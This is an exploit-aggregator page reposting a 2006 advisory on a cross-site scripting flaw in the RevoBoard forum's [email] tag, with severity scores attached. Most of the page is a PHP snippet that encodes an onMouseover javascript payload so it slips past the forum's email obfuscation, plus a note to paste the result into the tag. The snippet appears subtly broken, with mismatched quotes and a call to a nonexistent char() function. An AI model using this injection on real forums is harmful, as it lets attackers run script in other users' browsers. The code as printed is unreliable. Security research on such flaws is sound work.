Advertisement






RevoBoard [email] tag XSS

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2006-05-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040091

Below is a copy:

Revoboard (php) is based on an earlier version of PunBB.
I know for sure that this affects v1.8.

The email tag parser obsfucates emails to stop harvesters. To execute code, do this: 
[php]
$code = ''" onMouseover="javascript:alert(/xss/)">';
for($a=0;$a<strlen($code);$a++){
     $c = ord(substr($code,$a,1));
     $c += intval(-2);
     $str .= char($c);
}
print $str;
[/php]

And you just paste $str into the tag =).

r0xes

dynxss.whiteacid.org
criticalsecurity.net

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum